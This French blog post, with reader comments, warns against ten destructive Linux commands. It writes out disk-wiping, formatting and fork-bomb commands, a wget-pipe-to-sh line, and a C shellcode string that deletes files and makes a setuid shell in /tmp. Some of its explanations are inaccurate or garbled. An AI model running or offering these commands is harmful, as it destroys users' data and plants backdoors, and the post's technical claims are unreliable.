10 commandes dangeureuses sous Linux
Voici une liste de dix commandes Linux à ne jamais lancer. En effet celles-ci sont très dangereuses et vous n'êtes jamais à l'abri de les retrouver sur un forum ou un chat (irc ...). Il faut donc connaître leur fonctionnement pour éviter de les utiliser sans réfléchir.
1. rm -rf /
Cette commande efface tout simplement tous les fichiers contenus sur votre disque dur.
2. la version hexadécimale de la commande rm -rf / :
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
3. mkfs.ext3 /dev/sda
Mkfs est une commande utilisée pour formater les disques durs. Ici elle effacera les données du disque /dev/sda.
4. :(){:|:&};:
Cette commande bash, pleine de caractères bizarres, est en fait une bombe fork. Si vous la lancez, votre système sera contraint de créer des processus jusqu'à saturation de la mémoire. Et ceci provoquera donc le plantage de votre ordinateur.
5. any_command > /dev/sda
Avec cette commande, vous risquez d'écrire n'importe quoi dans les blocks du disque dur. Et cela pourrait entraîner une perte totale des données.
6. wget http://some_untrusted_source -O- | sh
On ne doit jamais télécharger et exécuter aussitôt un script se trouvant sur Internet. Vérifiez le sérieux du site et étudiez rapidement le code avant de le lancer.
7. mv ~/* /dev/null
Déplacer un fichier ou un répertoire vers /dev/null revient à le mettre à la poubelle. Et ceci sans possibilité de restauration.
8. 0:> [file]
La version bash de la commande ci-dessus est toute aussi redoutable.
9. dd if=/dev/zero of=/dev/sda
Cette commande va écrire des zéros dans tous les blocks du disque dur. Cela revient à faire un formatage complet.
10. chmod -R 777 /
Cette commande va positionner les droits de lecture et d'écriture sur tous les fichiers. Et les commandes situées dans /bin ne pourront plus fonctionner car elles ne supportent pas ce mode.
Au passage, si vous êtes curieux, vous pouvez éventuellement tester ces commandes dans une virtualbox. En prenant soin de faire un backup de l'image.
6 Commentaires pour "10 commandes dangeureuses sous Linux"
Flux des commentaires de cet article Ajouter un commentaire“Voici une liste de sept commandes Linux à ne jamais lancer.”
t'en a donné 10
merci pour ces commandes, je sens déjà que je vais être fan de "0:> [file]"
je ne savais pas que les prog du /bin ne suportait pas le mode 777... je m'endormirai moins con ce soir ^^
10 dangereuses et 7 à ne surtout pas lancer, par exemple si t'as envie de planter ton ordi... hop tu peux
Je déconne ^^
Merci pour la mise en garde pti-seb
Moi je suis un grand fan du rm -rf *. Mais je sais toujours où je suis, enfin sauf peut-êre une ou deux fois...
@Eric : dans l'article original de Tech source, il y a 7 commandes, j'en ai rajouté 3 après traduction. Et j'ai oublié de changé l'introduction de l'article au passage. Je viens donc de corriger.
@freezix : de rien.
@Philippe : mort de rire. C'est une erreur assez classique, dont beaucoup de personnes on fait les frais.
Salut,
un copain m'a fait essayer "yes `yes`" qui est pas mal non plus.
Salut, pour retrouver des fichiers effacés par rm: voir foremost, c'est gratuit : http://en.wikipedia.org/wiki/Foremost_(software) et http://foremost.sourceforge.net/